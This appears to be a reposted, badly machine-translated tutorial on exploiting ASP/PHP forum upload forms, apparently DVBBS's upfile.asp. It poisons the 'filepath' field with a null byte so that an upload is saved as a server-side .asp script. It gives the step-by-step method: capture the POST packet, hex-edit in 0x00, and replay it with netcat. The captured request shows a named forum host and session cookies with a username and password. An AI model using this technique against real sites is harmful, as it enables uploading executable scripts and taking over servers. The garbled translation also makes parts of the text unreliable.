2. Tech
  3. PHPASP upload vulnerability exploration (repost)

PHPASP upload vulnerability exploration (repost)

xiaoxiao2021-03-06  41

1: The principle of transmitting vulnerabilities is just the ASP and PHP scripts that are uploaded for Form format. *** NC (Netcat) is used to submit the data package DOS interface: NC -VV WWW. ***. Com 80 <1.txt - VV: Emo 80: WWW port 1.txt: is the packet you want to send (more ways to see the post) WSE (WSOCKEXPERT) to the local port monitor, capture the IE submitted packet 2: The principle of vulnerability The following example is the premise of the premise WWW host: www. ***. Com; bbs path: / bbs / vulnerability stems from the research on the on-board online, it is recommended to see the UPFILE.ASP file for DVBBS, There is no need to understand all UPFile is to generate an Form table, as shown below

Used Variables: FILEPATH Default UploadFace Properties Hiden Act Default UPLOAD Property Hiden file1 is the file you want to pass The key is filepath variable! By default, our file is uploaded to www. ***. COM / BBS / UPLOADFACE / file is named by your upload time, this is the filename = FormPath & Year (now) & Month in Upfile (NOW) NOW) & HOUR (NOW) & Second (now) & Rannum & "& fileext --------------------------- ----------- We know that the data in the computer is a "" Peugeot used C language knows char data [] = "bbs" this data number The length of the group is 4: BBS If we construct filepath as follows, what will it be? FilePath = "/ newmm.asp" We have changed in 2004.09.24.08.24, no change, no change: _BLANK> http: // www . ***. com / bbs / uploadface / 200409240824.jpg When using our filepath: _blank> http://www.***.com/newmm.asp/200409240824.jpg This When the server receives filepath data, Detecting newmm.asp to understand the data of FilePath, the file we uploaded, such as c: .as, save: _blank>

Http://www.***.com/newmm.asp 3: After the recovery vulnerability announced, many websites have made corresponding processing, but there are not many websites for FilePath filtering and processing. Variables to deal with Upfile.exe published on the Internet is the top-pass vulnerability utilization tool or FilePath variable utilization tool (veteran) ... but the most basic did not change. . And there are similar vulnerabilities on the plug-in on the website. I want to rely on which dedicated tools you can change the FilePath variables you caught by WSE, and then submit it with NC. . . Even if he adds N hiden variables, it is not necessary.

Of course, if we do very stringent filtering for FilePath, our theory will declare the end is the birth of our new theory! 4: Detailed example: ---------------- ----- First, WSE caution results (save to 1.txt): post /bbs/upphoto/upfile.asp http / 1.1 accept: Image / GIF, Image / X-Xbitmap, Image / JPEG, Image / PJPEG, Application / X-ShockWave-Flash, Application / VND.ms-Excel, Application / VND.ms-PowerPoint, Application / Msword, * / * Referer: _blank> http://www.xin126.com/bbs/upphoto / User-Agent: Mozip, Deflate User-agent: Mozilla / 4.0: Mozilla / 4.0: Mozilla / 4.0: Mozilla / 4.0: Mozilla / 4.0: Mozilla / 4.0: Mozilla / 4.0 ( compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322) host: _blank> www.xin126.com content-length: 1969 connection: keep-alive cache-control: no-cache cookie: aspsessionidaccccdcs = njhcphpalbcankobechkjanf; iscome = 1; gamvancookies = 1; regtime = 2004% 2D9% 2D24 3% 3A39% 3A37; username = szjwwww; pass = 5211314; dl = 0; userid = 62; ltstyle = 0; logIntry = 1; userpass = EB03F6C72908FD84 --- -------------------------- 7D423A138D0278 Content-Disposition: form-data; name = "filepath" ../medias/myph OTO / ---------------------------- 7D423A138D0278 ... Upload ----------- ---- 7D423A138D0278 ---------------- Second, UltraEdit opens 1.TXT change data: ... ------------ ----------------- 7D423A138D0278 Content-disposition: form-data; name = "filepath" /newmm.asp█ <=== This black represents a space is 0x20, changed 0x00 can be ... ---------------------------- Third, recalculate the cookies length, then NC submit NC - VV _BLANK> www.xin126.com 80 <1.txt UltraEdit is a 16-bit editor online can download us mainly used to write the end Peugeot: ====> 16 reputation: 0x00 or 00h is actually changed Just add a 00 in the end of FilePath, you will calculate the cookies length ===> After you change the fillevath, it is definitely or or -cookies to change ... Host: _blank>

转载请注明原文地址:https://www.9cbs.com/read-57466.html

9cbs

New Post(0)